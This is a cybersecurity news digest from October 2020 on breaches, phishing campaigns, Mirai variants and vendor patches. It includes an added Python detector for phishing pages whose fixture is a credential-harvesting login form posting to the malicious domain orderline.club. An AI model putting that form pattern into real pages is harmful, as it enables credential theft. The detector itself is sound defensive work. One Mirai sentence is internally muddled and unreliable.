Cyware Daily Threat Intelligence, October 15, 2020


The Iranian hacker group Silent Librarian has emerged from the shadows. Security researchers have discovered that the APT group is actively targeting universities across the world in a large spear-phishing campaign. The group fronts most of its phishing hostnames with Cloudflare so that the true hosting location of its servers is hidden. So far, the campaign has hit universities in Australia, the U.K., the U.S., Canada, Sweden, Germany, and the Netherlands.

In another development, several organizations have received DDoS extortion threats demanding a payment of $230,000. To show that the threat is genuine, the extortionists are including a list of the target's IP addresses in their demand letters.

Top Breaches Reported in the Last 24 Hours

Barnes & Noble confirms cyberattack
Barnes & Noble has confirmed a cyberattack affecting its Nook services. As a result, customers were unable to access their Nook libraries and previous purchases. The bookseller has partially restored its systems.

Panion leaks data
Panion, a Swedish software company, exposed over 2.5 million user records through an unsecured Amazon Web Services (AWS) storage bucket. The exposed data included personal information such as passwords, credit card data, and social security numbers. The bucket was publicly accessible for seven days before it was secured.

DDoS extortion threats
In a widespread DDoS extortion campaign, companies across the globe have been threatened with DDoS attacks unless a $230,000 ransom is paid. Travelex is among the targeted organizations. To show that the threat is genuine, the extortionists are also sending a list of the target's IP addresses.

ProctorTrack breached
ProctorTrack has disabled access to its service following an attack on its parent company, Verificient. In addition, the attackers defaced Verificient's website with a video.

Universities targeted
The notorious Silent Librarian threat actor group is back in action, targeting universities in Australia, the U.K., the U.S., Canada, Sweden, Germany, and the Netherlands. The group places its phishing hostnames behind Cloudflare to hide the true location of its servers, so the IP a defender resolves for a phishing domain is Cloudflare's edge rather than the actor's infrastructure.
Top Malware Reported in the Last 24 Hours

Mirai adds new exploits
Researchers have observed four new Mirai variants in the wild, along with the exploitation of two new command injection vulnerabilities. The variants differ in origin and configuration, but all of them contain the functionality needed to launch DDoS attacks. Variant four also includes an infection capability, as do the other three.

Magento phishing
A Magento admin login phishing page was found on a compromised website under the file name wp-order.php. To unsuspecting users the page looked like a legitimate Magento 1.x login page, but in the background it loaded its page elements from the malicious domain ‘orderline[.]club’, which is where the entered credentials were sent.
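The tell in this case is a login page hosted on one site whose form action and assets point at another domain. The script below is an added example, not code from Cyware or from the researchers who reported the page: it parses an HTML page with the standard library, lists every script, stylesheet, image, iframe or form that is served from a host other than the page's own, and flags a password form that posts off-site. The HTML sample and the host names shop.example and orderline.club are constructed for the example.

```python
"""Flag login pages that load assets from, or post credentials to, a host other
than the site hosting the page. Added example; standard library only."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the described page: it is served from the
# compromised site shop.example, but its stylesheet, one script and the login
# form itself point at orderline.club. Hypothetical host names.
SAMPLE_PAGE = """
<html><head>
<link rel="stylesheet" href="https://orderline.club/skin/adminhtml/css/admin.css">
<script src="/js/prototype.js"></script>
<script src="//orderline.club/js/collect.js"></script>
</head><body>
<form id="loginForm" method="post" action="https://orderline.club/admin/login.php">
  <input name="login[username]">
  <input type="password" name="login[password]">
</form>
</body></html>
"""

# Tag -> attribute that names the resource the tag pulls in or submits to.
RESOURCE_ATTRS = {"script": "src", "link": "href", "img": "src",
                  "iframe": "src", "form": "action"}


class ResourceCollector(HTMLParser):
    """Collect (tag, url) pairs and note whether a password field is present."""

    def __init__(self):
        super().__init__()
        self.refs = []
        self.has_password = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.has_password = True
        want = RESOURCE_ATTRS.get(tag)
        if want and attrs.get(want):
            self.refs.append((tag, attrs[want]))


def offsite_resources(html, page_host):
    """Return (tag, host, url) for each resource whose host differs from page_host.

    Absolute (https://h/...) and scheme-relative (//h/...) URLs carry a host;
    relative paths (/js/x.js) do not and are treated as on-site.
    """
    parser = ResourceCollector()
    parser.feed(html)
    page_host = page_host.lower()
    hits = []
    for tag, url in parser.refs:
        host = urlparse(url).hostname  # None for relative paths
        if host and host.lower() != page_host:
            hits.append((tag, host.lower(), url))
    return hits


def harvests_offsite(html, page_host):
    """Hosts that a password form on the page posts to, other than page_host.

    A non-empty result is the credential-harvesting pattern: the page asks for
    a password and sends it somewhere other than the site serving the page.
    """
    parser = ResourceCollector()
    parser.feed(html)
    if not parser.has_password:
        return []
    return sorted({host for tag, host, _ in offsite_resources(html, page_host)
                   if tag == "form"})


def defang(host):
    """Render a host as it should appear in a report (dots bracketed)."""
    return host.replace(".", "[.]")


if __name__ == "__main__":
    for tag, host, url in offsite_resources(SAMPLE_PAGE, "shop.example"):
        print(f"{tag:6} -> {defang(host)}  {url}")
    for host in harvests_offsite(SAMPLE_PAGE, "shop.example"):
        print("password form posts off-site to", defang(host))
```

Run against a suspicious file pulled from a web root (the `wp-order.php` name on a site that is not WordPress is itself a cue), the first function gives the full list of foreign hosts to block and report, and the second gives the one-line verdict. A legitimate Magento login page may load a CDN stylesheet, so treat off-site assets as a signal and the off-site password form as the finding.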
Top Vulnerabilities Reported in the Last 24 Hours

SonicWall fixes a flaw
SonicWall has issued patches for a critical stack-based buffer overflow (CVE-2020-5135) in SonicOS that is reachable through the HTTP(S) handling of the SSL VPN portal. An unauthenticated remote attacker can trigger it with a crafted request to crash the appliance and prevent users from connecting to corporate resources, and the bug may also be exploitable for remote code execution. Appliances with the VPN portal exposed to the internet should be patched promptly.

SAP issues updates
SAP's October 2020 Patch Day includes 15 security notes, six of which are updates to previously released notes. Among the issues patched is a flaw with a CVSS score of 10 in CA Introscope Enterprise Manager, the monitoring component used by SAP Solution Manager.


Posted on: October 15, 2020
